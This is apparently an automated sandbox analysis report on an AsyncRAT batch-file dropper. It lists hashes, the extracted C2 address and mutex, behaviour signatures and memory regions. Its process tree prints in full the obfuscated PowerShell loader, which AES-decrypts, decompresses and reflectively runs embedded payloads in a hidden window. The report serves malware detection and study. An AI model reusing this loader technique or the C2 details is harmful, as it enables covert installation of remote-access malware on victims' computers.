Analysis

  • max time kernel
    132s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 01:12

General

  • Target

    3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd

  • Size

    72KB

  • MD5

    4bfe57ca78dd1ac468e92a2307783552

  • SHA1

    73966e6a19ba6f1ea47002ddcbc42d5ac6434b22

  • SHA256

    3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee

  • SHA512

    21a0071708eaeead1ebf0cb96ab39955b6ced797c0b9e25005c5c8ae4659f2ef842de42572f15fa02eb91df82eb5ba82b1b0d06d09d908d835f039f23fca4572

  • SSDEEP

    1536:W4s6PYSYp0q0tIlQ2baGAIbsIpcEj/Bi81w2yfmfV2fymv:46PHY2glQ2nAIQUcY91Fj2fyi

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

hjdsasync.duckdns.org:8797

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Detects executables packed with ConfuserEx Mod 1 IoCs
  • Detects file containing reversed ASEP Autorun registry keys 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      2⤵
        PID:1016
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3596
        • C:\Windows\system32\cmd.exe
          cmd /c \"set __=^&rem\
          3⤵
            PID:992
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd';$jnWG='CopWZSmyTWZSmoWZSm'.Replace('WZSm', ''),'InlhpUvolhpUklhpUelhpU'.Replace('lhpU', ''),'CZIKWreaZIKWtZIKWeDeZIKWcZIKWryZIKWptoZIKWrZIKW'.Replace('ZIKW', ''),'ElzVbdemzVbdenzVbdtAzVbdtzVbd'.Replace('zVbd', ''),'ChayteonyteogeyteoEyteoxtyteoenyteosyteoionyteo'.Replace('yteo', ''),'ReplQraplQrdplQrLinplQresplQr'.Replace('plQr', ''),'EnRototRotorRotoyPRotooRotointRoto'.Replace('Roto', ''),'DecjqJxomjqJxpjqJxrjqJxesjqJxsjqJx'.Replace('jqJx', ''),'GeIEVqtCuIEVqrIEVqreIEVqntIEVqPrIEVqoIEVqcIEVqesIEVqsIEVq'.Replace('IEVq', ''),'FroWBktmBWBktasWBkte6WBkt4StWBktrWBktiWBktngWBkt'.Replace('WBkt', ''),'SpFryoliFryotFryo'.Replace('Fryo', ''),'MaoNWYinMoNWYodoNWYuoNWYloNWYeoNWY'.Replace('oNWY', ''),'LoZooQaZooQdZooQ'.Replace('ZooQ', ''),'TkUiTrankUiTsfokUiTrmkUiTFinkUiTalkUiTBkUiTlkUiTockkUiT'.Replace('kUiT', '');powershell -w hidden;function YsezZ($hYPZV){$VWSjA=[System.Security.Cryptography.Aes]::Create();$VWSjA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VWSjA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VWSjA.Key=[System.Convert]::($jnWG[9])('dIVP+hM/q3VrHeJIleztLe7YnRJfIUHX64EccbDbOY4=');$VWSjA.IV=[System.Convert]::($jnWG[9])('6IPeN2NKRdqw088nkuVbTg==');$BvjHr=$VWSjA.($jnWG[2])();$qFsMh=$BvjHr.($jnWG[13])($hYPZV,0,$hYPZV.Length);$BvjHr.Dispose();$VWSjA.Dispose();$qFsMh;}function ggFnh($hYPZV){$nRoYI=New-Object System.IO.MemoryStream(,$hYPZV);$BNSgW=New-Object System.IO.MemoryStream;$XVXGN=New-Object System.IO.Compression.GZipStream($nRoYI,[IO.Compression.CompressionMode]::($jnWG[7]));$XVXGN.($jnWG[0])($BNSgW);$XVXGN.Dispose();$nRoYI.Dispose();$BNSgW.Dispose();$BNSgW.ToArray();}$ldHdk=[System.IO.File]::($jnWG[5])([Console]::Title);$AAEWQ=ggFnh (YsezZ ([Convert]::($jnWG[9])([System.Linq.Enumerable]::($jnWG[3])($ldHdk, 5).Substring(2))));$xuGEv=ggFnh (YsezZ ([Convert]::($jnWG[9])([System.Linq.Enumerable]::($jnWG[3])($ldHdk, 6).Substring(2))));[System.Reflection.Assembly]::($jnWG[12])([byte[]]$xuGEv).($jnWG[6]).($jnWG[1])($null,$null);[System.Reflection.Assembly]::($jnWG[12])([byte[]]$AAEWQ).($jnWG[6]).($jnWG[1])($null,$null); "
            3⤵
              PID:1368
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
              3⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:628
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1716

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rdivse0i.wqd.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/628-20-0x0000000006180000-0x00000000061C4000-memory.dmp

          Filesize

          272KB

        • memory/628-3-0x0000000074450000-0x0000000074C00000-memory.dmp

          Filesize

          7.7MB

        • memory/628-22-0x0000000007710000-0x0000000007D8A000-memory.dmp

          Filesize

          6.5MB

        • memory/628-23-0x0000000007090000-0x00000000070AA000-memory.dmp

          Filesize

          104KB

        • memory/628-5-0x0000000074450000-0x0000000074C00000-memory.dmp

          Filesize

          7.7MB

        • memory/628-6-0x0000000005740000-0x00000000057A6000-memory.dmp

          Filesize

          408KB

        • memory/628-7-0x00000000057B0000-0x0000000005816000-memory.dmp

          Filesize

          408KB

        • memory/628-8-0x0000000005820000-0x0000000005B74000-memory.dmp

          Filesize

          3.3MB

        • memory/628-1-0x0000000002810000-0x0000000002846000-memory.dmp

          Filesize

          216KB

        • memory/628-19-0x0000000005D40000-0x0000000005D8C000-memory.dmp

          Filesize

          304KB

        • memory/628-18-0x0000000005D10000-0x0000000005D2E000-memory.dmp

          Filesize

          120KB

        • memory/628-0-0x000000007445E000-0x000000007445F000-memory.dmp

          Filesize

          4KB

        • memory/628-48-0x0000000074450000-0x0000000074C00000-memory.dmp

          Filesize

          7.7MB

        • memory/628-2-0x0000000004FA0000-0x00000000055C8000-memory.dmp

          Filesize

          6.2MB

        • memory/628-4-0x0000000004E40000-0x0000000004E62000-memory.dmp

          Filesize

          136KB

        • memory/628-21-0x0000000007010000-0x0000000007086000-memory.dmp

          Filesize

          472KB

        • memory/628-47-0x0000000074450000-0x0000000074C00000-memory.dmp

          Filesize

          7.7MB

        • memory/628-46-0x000000007445E000-0x000000007445F000-memory.dmp

          Filesize

          4KB

        • memory/628-38-0x0000000004B90000-0x0000000004BA2000-memory.dmp

          Filesize

          72KB

        • memory/628-39-0x0000000004BA0000-0x0000000004BAE000-memory.dmp

          Filesize

          56KB

        • memory/628-40-0x0000000007160000-0x0000000007172000-memory.dmp

          Filesize

          72KB

        • memory/628-43-0x0000000009E30000-0x0000000009ECC000-memory.dmp

          Filesize

          624KB

        • memory/628-44-0x000000000A480000-0x000000000AA24000-memory.dmp

          Filesize

          5.6MB

        • memory/1716-37-0x0000000074450000-0x0000000074C00000-memory.dmp

          Filesize

          7.7MB

        • memory/1716-25-0x0000000074450000-0x0000000074C00000-memory.dmp

          Filesize

          7.7MB

        • memory/1716-24-0x0000000074450000-0x0000000074C00000-memory.dmp

          Filesize

          7.7MB